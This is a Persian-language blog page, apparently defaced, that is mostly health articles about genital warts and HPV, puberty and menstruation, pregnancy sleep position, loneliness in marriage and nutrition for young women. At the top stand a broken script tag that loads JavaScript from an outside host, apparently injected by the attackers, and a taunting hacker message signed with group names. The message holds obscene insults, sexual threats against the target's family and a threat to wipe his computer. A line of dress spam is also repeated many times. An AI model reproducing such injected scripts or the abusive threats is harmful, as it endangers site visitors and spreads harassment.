script type="text/javascript" src="http://7vps.ir/img/website.js"> شاخ نشی دیگه !
کافی نت
وبلاگی جذاب

به اطلاع شما می رسونم که به علت شاخ بازی زیاد که در آوردی مجبور شدم کل آیدی های ریدکال و وبلاگت رو بزنم

در ضمن آقای شاخ که وقتی فحش میدی   طرف رو بن میکنی و می ترسی  بدون که گوه خوردن زیادی بعضی موقع ها منجر میشه خواهر و مادرت هم یکی بشه .

خیلی بهت لطف کنم اینه  مطمئن باش تو که هیچی گنده تر از تو هم خواهرش رو با مادرش پیوند دادیم.

پس بشین گوتو بخور  دره داهاتی .

گلابی جون فقط کافیه بشینم رو آیپی نتت  وقت بزارم pc که هیچی خودت هم F Disk میزنم بری یه سیفونی پوریا .

خدا افريده شاخ باشمmulti.multi.بیلاخ
مسواک بزن باهاش      his hal nadaram                  شــــروع کـن تــــا تـــــمـومــتــ کـــنـــــم

تو شاخ نیستی  شاخه ای

پرچم تهران تا دسته  تو  ک*نت

MamadInc-Iman Ahuora -RezaXz-Sadegh Danger

Server 4699993

خانه ایرانیان 



شنبه 25 خرداد 1392برچسب:, :: 12:19 قبل از ظهر
گری گوری

 

مدلهای پیراهن مجلسی زنانه و دخترانه 2011

مدلهای پیراهن مجلسی زنانه و دخترانه 2011

مدلهای پیراهن مجلسی زنانه و دخترانه 2011

مدلهای پیراهن مجلسی زنانه و دخترانه 2011

مدلهای پیراهن مجلسی زنانه و دخترانه 2011

مدلهای پیراهن مجلسی زنانه و دخترانه 2011

مدلهای پیراهن مجلسی زنانه و دخترانه 2011

مدلهای پیراهن مجلسی زنانه و دخترانه 2011

مدلهای پیراهن مجلسی زنانه و دخترانه 2011

مدلهای پیراهن مجلسی زنانه و دخترانه 2011

مدلهای پیراهن مجلسی زنانه و دخترانه 2011

مدلهای پیراهن مجلسی زنانه و دخترانه 2011

 



آشنایی با زگیل ناحیه تناسلی و درمان
 
 
 
آشنایی با زگیل ناحیه تناسلی و درمان
زگیل ناحیه تناسلی جزو آن دسته از بیماری‌هایی است که عده‌ای از مبتلایان از مراجعه به پزشک خجالت می‌کشند ولی اگر مورد غفلت واقع شود، ممکن است عارضه‌های ناخوشایندی به جای بگذارد...
 برای آشنایی با این بیماری با خانم دکتر شیرین نیرومنش، متخصص بیماری‌های زنان و زایمان و استاد دانشگاه علوم پزشکی تهران گفتگو كرده‌ایم.
خانم دکتر! لطفا در مورد زگیل ناحیه تناسلی و عامل ایجاد‌کننده آن توضیح دهید.
این زگیل بیماری عفونی ناحیه تناسلی است که معمولا از راه تماس جنسی منتقل می‌شود. عامل این بیماری ویروس پاپیلومای انسانی است که بیش از صد نوع دارد و برخی از انواع آنها می‌توانند این بیماری را ایجاد كنند. ویروس‌های عامل زگیل معمولی که روی سایر نقاط بدن مانند دست و پا دیده می‌شود، با ویروسی که باعث ابتلا به زگیل تناسلی می‌شود، متفاوت هستند.
این ویروس‌ها بیشتر در مخاط پیشابراه، مخاط دهان، حنجره، نای و راست روده وجود دارند. زگیل تناسلی در محیط مرطوب و گرم به وجود می‌آید و در دوران بارداری رشد سریع‌تری دارد.
 شیوع این بیماری تا چه حد است؟
زگیل تناسلی یکی از شایع‌ترین بیماری‌های منتقل شونده از راه تماس جنسی محسوب می‌شود. تشخیص عفونت در مردان سخت‌تر است. بیشترین سن شیوع بیماری در دوره جوانی است.
 برای اینکه به این مشکل دچار نشویم، بهتر است با راه‌های انتقال آن آشنا شویم. در این مورد برایمان توضیح ‌دهید.
ویروس در اثر تماس نزدیک با پوست یا مخاط فرد آلوده به فردسالم منتقل می‌شود. این بیماری بسیار مسری است یعنی به راحتی از فردی به فرد دیگر سرایت می‌کند. همیشه در فرد آلوده (به ویژه در مردان) زگیل را به طور مشخص نمی‌توان دید. ممکن است حین زایمان ویروس از مادر به كودك منتقل شود.
 نشانه‌های زگیل تناسلی چیست؟
اندازه این زگیل‌ها معمولا حدود 1 تا چند میلی‌متر است و به شکل برجستگی‌هایی با سطح صاف یا ناصاف به رنگ پوست یا کمی تیره‌تر یا روشن‌تر دیده می‌شوند. زگیل‌ها گاهی منفرد و گاهی به‌هم‌پیوسته و به شکل توده‌های گل‌کلمی هستند.
زگیل در بسیاری از موارد آنقدر کوچک است که به راحتی قابل مشاهده نیست. محل شایع ایجاد ضایعه در زنان در ناحیه وولو (فرج)، واژن (مهبل)، سرویکس (گردن رحم)، مقعد و کشاله ران و در مردان آلت تناسلی، کیسه بیضه (اسکروتوم)، ران، و کشاله ران است. بیشتر بیماران به خصوص مردان، علامتی ندارند. تعداد کمی از زنان مبتلا از درد، خارش، سوزش یا خونریزی محل ضایعه شکایت می‌كنند.
چه مدت بعد از آلوده شدن به ویروس علایم بیماری ظاهر می‌شوند؟
این مدت از چند ماه تا چند سال متفاوت است. البته در بعضی افراد سیستم ایمنی با ویروس مبارزه می‌کند و مانع ایجاد بیماری می‌شود.
 شیوه‌های درمان بیماری چگونه است؟
درمان خاصی برای ریشه‌کن كردن ویروس و عود نكردن همیشگی آن وجود ندارد اما روش‌های گوناگونی برای درمان به کار می‌رود که عبارتند از: تجویز دارو، روش‌هایی نظیر کرایوتراپی (منجمد کردن ضایعه با نیتروژن مایع) و الکتروکوتر (از بین بردن ضایعه با جریان الکتریکی یا لیزر).
 اگر درمان، ویروس را ریشه کن نمی‌کند پس چه فایده‌ای دارد؟
احتمال گسترش و پراکنده شدن ویروس را کم و درد یا خارش را برطرف می‌کند همچنین زگیل‌ها را که از نظر ظاهری ناخوشایند هستند و ممکن است تمیز نگه داشتن آنها هم مشکل باشد، از بین می‌برد.
 آزمایش پاپ اسمیر در زنان مبتلا به این بیماری چه ضرورتی دارد؟
برای تمام زنانی که عفونت ویروس پاپیلومای انسانی داشته‌اند، باید به طور مرتب این آزمایش انجام شود تا بتوان به موقع هرگونه ناهنجاری را در سلول‌های واژن و گردن رحم شناسایی و درمان كرد و احتمال سرطان را کاهش داد.
 آیا این بیماری واکسن هم دارد؟
بله. دو واکسن «گارداسیل» و «سرواریکس» با ایمن‌سازی بدن در مقابل برخی از انواع ویروس پاپیلومای انسانی، می‌توانند از ابتلا به زگیل تناسلی پیشگیری كنند. «گارداسیل» در مقابل چهار نوع ویروس پاپیلوما مصونیت می‌دهد و برای زنان و مردان توصیه شده ولی «سرواریکس» در برابر دونوع ویروس شایع مصونیت ایجاد می‌کند و برای زنان توصیه شده است. برای اینکه واکسن بیشترین تاثیر را داشته باشد، باید در 3 نوبت طی شش ماه تزریق شود.
 این بیماری با سرطان چه ارتباطی دارد؟
برخی از انواع این ویروس باعث سرطان گردن رحم می‌شوند. برخی دیگر می‌توانند باعث ابتلا به سرطان مقعد، سرطان آلت تناسلی در مردان و سرطان دهان و گلو شوند. یک فرد ممکن است به بیش از یک نوع ویروس مبتلا شود. شدت و خطرهای بیماری در کسانی که به دلیلی دچار نقص سیستم ایمنی هستند (مانند مبتلایان به ایدز یا گیرندگان پیوند عضو که از داروهای تضعیف‌کننده سیستم ایمنی استفاده می‌کنند)، بیشتر است.



 

روش خوابیدن زنان باردار زمان تولد را مشخص می کند
 
 
 
روش خوابیدن زنان باردار زمان تولد را مشخص می کند
تحقیقات جدید محققان نشان می دهد که مناسب نبودن مکان استراحت زنان باردار می تواند ریسک تولد پیش از موعد را افزایش دهد.
 به نقل از بی بی سی؛ نحوه خوابیدن و استراحت کردن زنان باردار می تواند زمان تولد جنین را تعیین کند .
تحقیقات جدید بر 155 زن باردار در دانشگاه اوکلند نشان می دهد ، نحوه خوابیدن زنان با زمان تولد جنین در ارتباط است . یکی از دلایلی که زنان زایمان زودرس دارند به دلیل نحوه و شیوه بد استراحت آنها بوده است.
عوامل دیگری مانند : اضافه وزن مادر ، سن زیاد ، قومیت ، ناهنجاری های مادرزادی یا شرایط نامناسب جفت نیز می توانند باعث تولد زودس شوند .
محققان بهترین حالت را خوابیدن به پهلو و جمع کردن زانو می دانند . این وضعیت خوابیدن کارکرد قلب مادر و جنین را در شرایط مساعدتری قرار می دهد .
نتایج این تحقیقات در ژورنال پزشکی بریتانیا به چاپ رسیده است .

 



تاثیرات بلوغ بر جسم و روان دختران
 
 
 
تاثیرات بلوغ بر جسم و روان دختران
بلوغ یعنی دوره انتقال از مرحله كودكی به بزرگسالی و كسب قدرت باروری. از نظر لغوی، بلوغ به معنی رسیدن به سن رشد، مرد شدن، زن شدن، رسیدگی و پختگی و به حد كمال رسیدن است... 
با دكتر صفیه شهریاری، متخصص زنان و زایمان درباره علایم و بحران‌های همین دوران گفتگو كرده‌ایم.
 اهمیت این دوره از زندگی در چیست؟ چرا بلوغ را دوره مهمی از زندگی می‌دانند؟
ببینید؛ طبق تعریف سازمان جهانی بهداشت، نوجوان به گروه سنی 10 تا 19سال اطلاق می‌شود كه با تحول‌های فراوان جسمی و روانی همراه است و موجب تغییر نگاه فرد نسبت به جهان اطراف، رفتار و احساساتش می‌شود. نوجوان گاهی دچار تشویش و نگرانی شده و تصمیم‌گیری‌ برایش سخت می‌شود. از مسایل عمده‌ دیگری كه نوجوان در دوره بلوغ با آنها روبه‌رو ست، تغییرهای جسمانی است و اگر نوجوان و اطرافیان به خوبی از این تغییرها آگاهی نداشته باشند، این باعث تشویش و نگرانی خودش و اطرافیان می‌شود. علاوه بر این، وجود پاره‌ای اعتقادها و باورهای سنتی نیز می‌تواند به مشكل‌های نوجوان بیفزاید. اگر نوجوان مسایل و مشكل‌های بلوغ را در محیطی سرشار از تفاهم، صمیمیت و آگاهی و با كمك خانواده و جامعه بشناسد، این دوره را به خوبی طی می‌كند و با نشاط و سلامت پا به عرصه بزرگسالی می‌گذارد. در حال حاضر، بیش از 5/1 میلیارد نفر از جمعیت جهان را نوجوانان تشكیل می‌دهند. با توجه به اینكه زیربنای بزرگسالی افراد در دوره بلوغ به وجود می‌آید و بسیاری از مشكل‌های مختلف جسمانی، روانی و اجتماعی جوانان ریشه در دوران بلوغ دارد، آشنایی با دوران بلوغ برای نوجوانان و والدین آنها امری ضروری است.
 لطفا کمی از تغییرات جسمی بلوغ در دختران بگویید.
ظهور علامت‌های جسمی بلوغ به دنبال برخی تغییرهای هورمونی بدن و از طریق مغز (سیستم هیپوفیز و هیپوتالاموس) كنترل و شروع می‌شود و این تغییرهای جسمی، همراه با جهش رشد نوجوان است و به ترتیب، با جوانه‌زدن پستان‌ها و رشد آنها شروع می‌شود و با پیدایش موهای تناسلی در زیر بغل و در نهایت با قاعدگی به پایان می‌رسد.
معمولا جهش رشدی در دختران حداقل 2 سال زودتر از پسران اتفاق می‌افتد؛ به طوری كه در مدت 1 سال، قد دختران حدود 6 تا 11 سانتی‌متر بلندتر می‌شود. جهش چشمگیر رشد معمولا 2 سال بعد از جوانه زدن پستان‌ها و 1 سال قبل از شروع عادت ماهانه اتفاق می‌افتد. سرعت بالای رشد باعث افزایش رشد، به خصوص در استخوان‌ها و غضروف‌ها می‌شود ولی هورمون‌های جنسی (استروژن) سبب بسته شدن صفحه رشد استخوان و كند شدن رشد استخوان‌ها می‌شود.
به همین دلیل است كه پس از قاعدگی، سرعت رشد قد كندتر شده و معمولا دخترها بیش از 6 سانتی‌متر افزایش قد ندارند. زمان و سرعت رشد تحت‌تاثیر عوامل متعددی از جمله وراثت، تغذیه، محل جغرافیایی، تماس با نور و شرایط روانی است.
رشد پستانی معمولا در سن 5/7 تا 5/12 سالگی روی می‌دهد. البته به طور متوسط در 5/9 سالگی پستان‌ها رشد می‌كنند. موهای شرمگاهی در 5/10 سالگی ظاهر می‌شوند و در ناحیه زیر بغل نیز مو پدیدار می‌شود. آخرین مرحله بلوغ نیز قاعدگی است كه در سن 9 تا 16 سالگی و به طور متوسط در 13 سالگی اتفاق می‌افتد. در پایان دوره بلوغ با تغییر فُرم اندام‌ها، پیدایش هیكل زنانه‌ روی می‌دهد. لگن پهن می‌شود، ران‌ها كلفت‌تر می‌شوند و چربی به شكل زنانه در بدن توزیع می‌شود.
در این دوره بر اثر ترشحات هورمونی فعالیت غدد چربی و عرق نیز در دختران افزایش می‌یابد. در بعضی از نوجوانان جوش‌هایی روی صورت دیده می‌شود كه نباید دستكاری شوند؛ زیرا عفونی می‌شوند و فقط باید آنها را به طور مرتب با آب و صابون شست. در صورتی كه تعریق زیاد شود علاوه بر استحمام می‌توان از اسپری‌های‌ زیر بغل یا لوسیون‌های بهداشتی استفاده كرد.
ممكن است كمی درباره چگونگی قاعدگی توضیح دهید؟
بله؛ به خروج خون و قطعات ریزش‌یافته،‌ لایه پوششی درون رحم می‌گویند قاعدگی، پریود، حیض یا رگل. یك قاعدگی طبیعی به سلامت 3 ناحیه از بدن بستگی دارد. این نواحی كه پس از بلوغ به‌طور هماهنگ عمل می‌كنند، عبارتند از: مغز (هیپوفیز و هیپوتالاموس)، تخمدان‌ها و رحم.
این نواحی 3گانه چگونه فرآیند قاعدگی را تنظیم می‌کنند؟
هیپوتالاموس یك ساختمان كوچكی در قاعده مغز است كه از دوره بلوغ شروع به ترشح ماده‌ای به نام هورمون گونادوتروپین می‌كند و این ماده روی غده هیپوفیز اثر می‌گذارد و سبب ساخته‌شدن هورمون‌های تحریك‌كننده فولیكول و هورمون جسم زرد می‌شود كه توسط خون به تخمدان می‌رسند. این مواد روی تخمدان تاثیر می‌گذارند وباعث ترشح هورمون‌های جنسی زنانه (استروژن و پروژسترون) از تخمدان می‌شوند. هورمون استروژن باعث رها شدن تخمك از تخمدان می‌شود كه به این عمل تخمك‌گذاری می‌گویند و معمولا 14 روز قبل از عادت ماهانه اتفاق می‌افتد و از این زمان به بعد، پروژسترون از طریق تخمدان ساخته می‌شود.
در ضمن، هورمون‌های استروژن و پروژسترون با همدیگر روی بافت پوششی درون رحم تاثیر می‌گذارند كه در اثر آن، لایه ضخیمی درون رحم ایجاد می‌شود و در صورت عدم بارداری در پایان دوره عادت ماهانه به صورت قاعدگی همراه با خون‌ریزی، خود را نشان می‌دهد. هورمون استروژن همچنین باعث رشد اعضای دستگاه تناسلی، پستان‌ها، استخوان‌ها و بروز صفات زنانه می‌شود. اولین روز یك دوره خون‌ریزی تا اولین روز خون‌ریزی بعدی را یك دوره عادت ماهانه می‌نامند كه معمولا بین 21 تا 39 روز است.
 ولی طول دوره عادت ماهانه در خانم‌ها و حتی مدت روزهای خون‌ریزی در یك خانم هم ثابت نیست؛ چرا؟
خب، البته این تغییر به مدت چند روز تا یك هفته می‌تواند طبیعی باشد. طولانی شدن دوره عادت ماهانه بیش از 39 روز، به خصوص در صورت تكرار آن در ماه‌های بعد، باید تحت بررسی قرار گیرد. كوتاه شدن دوره عادت ماهانه به میزان كمتر از 21 روز نیز به خصوص اگر تكرار شود، ممكن است به دلایل بیماری‌های رحمی یا تخمدانی باشد كه باید بررسی شود. به طور كلی، دو سوم زنان دوره عادت ماهانه منظمی دارند. میزان خون خارج‌شده در هر نوبت عادت ماهانه بین 30 تا 80 میلی‌لیتر است كه طی 3 تا 7 روز خارج می‌شود و روزانه به طور متوسط 3 تا 5 نوار بهداشتی استفاده می‌شود. بیشترین خون‌ریزی در روزهای اول تا سوم اتفاق می‌افتد. قاعدگی‌های اول بدون تخمك‌گذاری است و به همین دلیل ممكن است از نظر فواصل زمانی، مقدار خون‌ریزی یا مدت خون‌ریزی نامنظم و غیرقابل پیش‌بینی باشد ولی معمولا 2 تا 5/2 سال پس از شروع قاعدگی خودبه‌خود منظم می‌شود.
چه زمانی به بلوغ، زودرس یا دیررس می‌گوییم؟
اگر تا سن 14 سالگی علایم و صفات ثانویه جنسی یعنی رشد پستان‌ها، رشد موهای زیربغل و موهای تناسلی و رشد كافی بدن صورت نگرفت یا اگر تا سن 16 سالگی، قاعدگی رخ نداد؛ بلوغ، دیررس است و باید به پزشك مراجعه شود. اگر بلوغ قبل از 8 سالگی رخ دهد نیز بلوغ، زودرس است كه در این صورت نیز باید به پزشك مراجعه شود. معمولا آغاز تغییرهای بلوغ به طور عمده به وسیله عوامل ژنتیكی تعیین می‌شود و محل جغرافیایی، وضعیت تغذیه و عوامل روان‌شناختی نیز بر سن آغاز تاثیر می‌گذارند.
 علایم جسمی و روانی قبل از عادت ماهانه چگونه‌اند؟
افزایش وزن، احساس سنگینی در شكم و كل بدن، تورم دست‌ها و صورت، بزرگ یا دردناك‌شدن پستان‌ها، سردرد، تهوع، استفراغ، اسهال، بی‌اشتهایی یا تمایل به بعضی از غذاها، خستگی و تكرر ادرار یا كمردرد، درد زیر دل، تغییرهای خلق، نگرانی، افسردگی، ناامیدی، تحریك‌پذیری، كاهش قدرت تمركز و منفی‌گرایی همراه با دل‌درد در تمام افراد كم‌وبیش دیده می‌شود.
در عین حال، دل‌درد در دوران قاعدگی ممكن است چند ساعت قبل یا هم‌زمان با خون‌ریزی شروع شود كه معمولا بیش از 2 یا 3 روز اول ادامه نمی‌یابد. باید این نکته را هم یادآوری ‌كنم که اگر والدین می‌توانستند به یاد بیاورند كه خودشان وقتی كه در سن و سال نوجوانی بودند چه احساسات و عواطفی داشته‌اند آن وقت شاید برای درك نوجوانان تلاش بیشتری از خود نشان می‌دادند. لازم است به آموزش همسالان در زمینه بلوغ نیز تاكید كنم كه باید در مدارس انجام شود.



احساس تنهایی در زنان شوهردار
 
 
احساس تنهایی در زنان شوهردار
جان کاچیپو استاد دانشکده روانشناسی دانشگاه شیکاگو، تنهایی را اینطور تعریف می‌کند: نشانه آزارنده‌ای که هدف آن ترغیب ما به برقراری ارتباط است." 
نگاه کلی
جان کاچیپو استاد دانشکده روانشناسی دانشگاه شیکاگو، تنهایی را اینطور تعریف می‌کند: نشانه آزارنده‌ای که هدف آن ترغیب ما به برقراری ارتباط است." زنان متاهلی که احساس تنهایی می‌کنند باید به این نشانه توجه کنند و برای برطرف کردن این وضعیت اقدام کنند. تنهایی اگر برخورد نشود، قدرت این را دارد که ازدواج را برهم بزند و می‌تواند بر سلامت جسمی شما هم تاثیر منفی بگذارد.
تئوری‌ها/تصورات
زنان متاهل به دلایل مختلف، مثل سو‌استفاده احساسی، فقدان صمیمیت فیزیکی یا زمانیکه مشکلات کاری باعث می‌شود زمان کمتری را کنارهم سپری کنند، ممکن است احساس تنهایی کنند. طبق گفته‌های پپِر شوارتز، استاد دانشگاه واشنگتن، میل برآورده‌نشده برای ارتباط احساسی هم باعث می‌شود خیلی از زنان متاهل احساس تنهایی کنند. دکتر شوارتز می‌گوید، "دوستان دختر با علاقه، توجه و محبت گوش می‌دهند، مهم نیست که مردی چقدر خوب باشد، مقایسه رابطه‌ با همسرشان با دوستی که با خانم‌ها دارند باعث می‌شود احساس تنهایی کنند."
تصورات نادرست
اگر احساس تنهایی می‌کنید، ازدواج کردن چاره کار شما نیست. درواقع، این تصور غلط که ازدواج می‌تواند تنهایی را درمان کند باعث می‌شود که برخی خانم‌ها وارد روابطی شوند که حتی باعث بدتر شدن احساس تنهاییشان شود. در کتاب “The Mirages of Marriage”، ویلیام جی لادرر و دان دی جکسون خاطرنشان می‌کنند که، "شدیدترین و آزاردهنده‌ترین تنهایی، تنهایی است که با فردی دیگر آغاز می‌شود." وقتی ازدواج نتواند تنهایی فرد راپر کند، خشم، تلخی و پس‌زدن احساسی اتفاق می‌افتد که می‌تواند موجب بیشتر شدن حس تنهایی شود.
خطرات
براساس گفته‌های پروفسور کاچیوپو، تنهایی می‌تواند از نظر جسمی نیز بر قلب فرد تاثیر بگذارد. او می‌گوید، مغز افراد تنها مقدار بسیارزیادی کورتیزول که هورمون استرس است تولید می‌کند که بر سیستم قلبی-عروقی اثر گذاشته و می‌تواند خطر بیماری‌های قلبی را افزایش دهد.
همچنین تنهایی می‌تواند موجب افسردگی و رفتارهای خودتخریب مثل اعتیاد یا خیانت شود. براساس گفته‌های دکتر جویس هامیلتون‌بری زنان متاهلی که احساس تنهایی می‌کنند، بیشتر به خیانت کشیده می‌شوند. او می‌گوید، "زنان معمولاً زمانی دست به خیانت می‌زنند که ازدواج خواسته‌های آنها را برطرف نکرده و دچار مشکل باشد."
نظر متخصصین
دکتر شوارتز خاطرنشان می‌کند که حرف زدن با دوستان درمورد مشکلات و مسائل زندگی زناشویی می‌تواند کمک‌کننده باشد. او به خانم‌ها توصیه می‌کند که توقعات بیش‌ازحد از همسر خود نداشته باشند و خودشان هم توجه کافی به شوهر خود داشته باشند. خیلی اوقات برای به‌دست آوردن توجهی که از طرف مقابل انتظار داریم، باید خودمان همان میزان به او توجه نشان دهیم. او می‌گوید، "ازطرف دیگر، اگر به‌اندازه کافی توجه می‌کنید اما توجهی درمقابل دریافت نمی‌کنید، آنوقت مشکل وجود دارد."
درخواست کمک
دکتر شوارتز به زنان متاهلی که احساس تنهایی می‌کنند پیشنهاد می‌کند که زمان بیشتری را کنار دوستان دختر خود بگذرانند و زندگی اجتماعی خارج از زندگی زناشویی خود ایجاد کنند. همچنین باید درمورد علت احساس تنهاییشان با همسرشان صحبت کنند و سعی کنند باهم برای ساختن رابطه‌ای قوی تلاش کنند. مشاوره و درمان، چه به تنهایی یا درکنار همسر هم می‌تواند برای ریشه‌یابی این مشکل مفید باشد.



فقط زنان جوان بخوانند
 
 
متخصصان تاكيد دارند: زنان در سن 30 سالگي بايد مراقبت‌هاي بهداشتي خاص و صحيحي را براي حفظ سلامت عمومي خود در نظر بگيرند تا از اين طريق نه تنها به بهبود كيفيت زندگي خود كمك كنند بلكه در عين حال كمكي مفيد براي افرادي باشند كه به آنها وابسته هستند.
به گزارش سرويس بهداشت و درمان ايسنا، دنبال كردن يك رژيم غذايي سالم و مناسب و همچنين ورزش كردن دو اقدام فوق العاده موثر براي رسيدن به اين هدف و دستيابي به سلامت كلي است.
رعايت يك رژيم غذايي صحيح و كامل بويژه براي زنان حائز اهميت است چون آنها در هر مرحله از زندگي خود از دوران جواني گرفته تا زمان بارداري و سپس در سالهاي يائسگي نيازهاي تغذيه‌اي خاص دارند. زنان جوان در دهه 20 سالگي اغلب به كار سخت و طولاني مدت اشتغال دارند و به همين دليل ممكن است تحت استرس زياد باشند.
از سوي ديگر، عواملي چون مصرف تنقلات و فست فودها، پرخوري يا انتخاب مواد غذايي ناسالم و يا فقدان تحرك بدني، سلامت آنها را بيشتر به خطر مي‌اندازد. از طرفي آماده شدن براي زندگي مشترك زناشويي و انتخاب همسر مناسب، استرس مضاعفي را به زنان شاغل تحميل مي‌كنند تمام اين فاكتورها در كنار هم تاثير بسزايي روي بهداشت جسمي و رواني زناني برجاي مي‌گذارند و اين در حالي است كه نقش زنان در خانواده و جامعه بسيار حائز اهميت است چون اعضاي خانواده و همكاران بي‌ترديد در امور روزمره به آنها وابسته خواهند بود.
مجله اينديا اكسپرس در مقاله‌اي در اين باره آورده است: مصرف الكل در زنان خطر پوكي استخوان را تشديد مي‌كند. همچنين آنها بايد مصرف قهوه و نوشابه كولا را كه حاوي كافئين است را كاهش دهند. زنان در دهه 20 سالگي نياز بيشتري به كلسيم دارند تا استخوانهاي آنها به خوبي ساخته شوند و بويژه در اين سالها بايد فعاليت فيزيكي مناسبي داشته باشند و ورزش را فراموش نكنند. زنان بايد سويا را به رژيم غذايي خود بيفزايند چون آنها را در برابر سرطان و بيماري قلبي محافظت مي‌كند. بعلاوه از آنجا كه در اين گروه سني ماهيچه‌ها و عضلات فعال‌تر هستند، نياز بيشتري به مصرف كالري‌ها، پروتئين‌ و ويتامين‌ها وجود خواهد داشت. بعلاوه مصرف مايعات به اندازه متعادل ضروري است.
كارشناسان تاكيد دارند كه زنان در اين گروه سني حتما بايد انواع مختلفي از ميوه‌ها و سبزيجات تازه را به مقدار زياد مصرف كنند. همچنين بهتر است دفعات وعده‌هاي غذايي خود را ا فزايش داده اما از حجم غذا در هر وعده بكاهند. آنها نبايد به صورت طولاني گرسنه بمانند همچنين بايد در طول روز مقادير زيادي آب بنوشند.
تغذيه مناسب همچنين مي‌تواند زيبايي و سلامت موها را تضمين كند. كمبود ويتامين‌هاي A و B مي‌تواند موجب سوء تغذيه در سلولهاي پياز مو شود. ريبوفلاوين، نياسين و اسيد پانتوتنيك توصيه مي‌شود. گوشت حاوي انواع ويتامين B است و مخمر هم براي اين منظور يك مكمل مفيد است. استفاده از اين مكمل‌ها سلامت موها را از 20 تا 50 سالگي تضمين مي‌كند.
همچنين ويتامين‌ها در حفظ سلامت پوست بسيار موثر هستند. كمبود ويتامين E مي‌تواند منجر به بروز مشكلات و ناراحتي‌هاي قلبي شود اما در عين حال براي حفظ سلامت عروق خوني نيز ضروري است. اين ويتامين براي حفظ سلامت موها و پوست و عروق توصيه مي‌شود و مصرف 50 تا 400 ميلي گرم آن در روز براي جلوگيري از ريزش مو و فقر ويتامين E كافي است.
يكي ديگر از نكات بسيار مهم براي زنان استفاده از مكمل‌هاي مناسب براي جلوگيري از فقر آهن است. كم خوني يكي از مشكلات شايع بين زنان جوان است و مصرف مكمل‌هاي حاوي اين عنصر مهم با تجويز پزشك متخصص براي پيشگيري از كم خوني و پيامدهاي آن ضروري است.



سوالات مهم از متخصص زنان و زایمان برای دختران
سوالات مهم از متخصص زنان و زایمان برای دختران
اگرچه بیشتر خانم ها تصور می‌کنند درباره قاعدگی اطلاعات کافی دارند، ولی مواردی هست که خیلی از آنان درباره‌اش بی‌اطلاع‌اند و همیشه ممکن است در این خصوص، اتفاقاتی بیفتد که تا کنون با آن مواجه نشده باشند.
این مطلب، شما را با رایج‌ ترین پرسش‌هایی که خانم ها درباره قاعدگی از پزشک متخصص زنان و زایمان می‌پرسند، آشنا می‌کند.
1- چرا قاعدگی، خلق و خوی آدم را عوض می کند؟
اصولا سندروم پیش از قاعدگی (PMS) به این دلیل رخ می‌دهد که بدن به تغییرات هورمونی، حساس می‌شود. 10 روز قبل از شروع قاعدگی، سطح هورمون‌هایی مثل پروژسترون و استروژن به سرعت تغییر می‌کنند و این تغییر سبب بروز علایمی مثل نفخ، تغییرات خلق و خو، سردرد، حساسیت پستان‌ها و خستگی می‌شود.
نزدیک به 90 درصد از خانم ها قبل از قاعدگی‌شان این نشانه‌ها را تجربه می‌کنند. حتی 20 درصد از آنها دچار علائم شدیدتری می‌شوند که بر فعالیت‌های طبیعی‌ زندگی‌شان و حتی بر روابط فردی آنها تاثیر می‌گذارد.
اما چه باید کرد؟ اول اینکه مطمئن شوید که از نظر جسمی مشکلی ندارید. بعد سعی کنید ورزش کنید، مخصوصا وقتی احساس می‌کنید خلق شما تنگ شده است. مایعات فراوانی بنوشید، حتی هر دو ساعت یک بار. اگر با این کارها بهتر نشدید از پزشک خود کمک بگیرید. مکمل‌های کلسیم و ویتامین‌ها نیز در کاهش نشانه‌های پیش از قاعدگی موثرند. گاهی مصرف قرص‌های ضد بارداری با نظر پزشک و در موارد شدید، مصرف داروهای ضدافسردگی سبب بهبود این نشانه‌ها می‌شود.
2- چرا گاهی اوقات قاعدگی‌ نامنظم می‌شود؟
عادت ماهیانه خانم ها هر 28 روز یک بار تکرار می‌شود، اما گاهی پیش می‌آید که شما دو ماه یک بار پریود می شوید و گاهی هر 26 روز ، 35 یا 42 روز یک ‌بار. قاعدگی طبیعی باید به فاصله 25 تا 35 روز رخ ‌دهد؛ یعنی از شروع اولین خون‌ریزی تا خون‌ریزی بعدی باید 25 تا 35 روز طول بکشد. بسیاری از خانم ها که قاعدگی شان در یک روز در هر ماه اتفاق نمی‌افتد (مثلا تاریخ بیست و پنجم هر ماه)، فکر می‌کنند قاعدگی‌شان طبیعی نیست. ولی این افراد نباید نگران شوند؛ زیرا لازم نیست قاعدگی دقیقا در همان روز ایجاد شود. تغییر دو سه روزه در قاعدگی، مشکل خاصی نیست. اما اگر فاصله بین دو پریود، به کمتر از 25 روز یا بیشتر از 35 روز برسد، باید با پزشک مشورت کرد.
عادت ماهیانه به ویژه در دوران نوجوانی و سال اول بلوغ منظم نیست، چون سیستم هورمونی بدن هنوز کار خود را به خوبی آغاز نکرده است. این امر ممکن است دو سال یا حتی بیشتر هم ادامه یابد. حدود 45 تا 50 سالگی نیز که اکثر خانم ها به سن یائسگی نزدیک می‌شوند، دستگاه هورمونی تقریبا خسته و عادات ماهیانه نامنظم می‌شوند. این حالت تا زمان یائسگی ادامه خواهد داشت!
حتی اگر از موضوع سن هم بگذریم، باز هم نامنظم بودن عادت ماهیانه امر بسیار مهمی نیست. اما اگر عادات ماهیانه شما مدت‌ طولانی نامنظم بود، توصیه می‌کنیم به متخصص زنان مراجعه کنید.
استرس، اضطراب و اتفاقات نگران‌کننده با تغییر روند تخمک‌گذاری و ایجاد اختلالاتی در ترشح پروژسترون می توانند سبب قاعدگی نامنظم شوند. مشکلات تیرویید، هیپوتالاموس یا هیپوفیز که در تولید هورمون‌های زنانه دخیل‌اند، هم می‌توانند سبب نامنظمی عادات شوند. حتی ممکن است تخمدان‌ها دچار مشکلی باشند و با وجود فرمانی که از مغز دریافت می‌کنند، هورمون کافی تولید نکنند! جالب است بدانید افزایش ترشح هورمون مردانه هم سبب نامنظمی دوره‌ها می‌شود. عفونت، تومور، فیبروم یا آندومتریوز هم می‌توانند از علل احتمالی باشند.
از دلایل دیگر بی‌نظمی یا قطع قاعدگی، اضافه وزن ، کاهش وزن ، اختلالات تغذیه‌ای و انجام ورزش‌های سنگین است.
3- چرا گاهی اوقات بین دو قاعدگی، ترشحات سفید رنگ دیده می‌شود؟
نگران نباشید؛ این ترشحات طبیعی هستند. این ترشحات در برخی روزها کمتر و گاهی بیشترند. غددی که داخل واژن قرار گرفته‌اند این ترشحات را تولید می‌کنند که نقش اصلی آن جلوگیری از ورود میکروب به داخل رحم است. در میان دو دوره و در زمان تخمک‌گذاری میزان ترشحات افزایش می‌یابد و وجود آن کمک می‌کند تا در این زمان اسپرم ها راحت‌تر از دهانه رحم بالا بروند و به تخمک برسند.
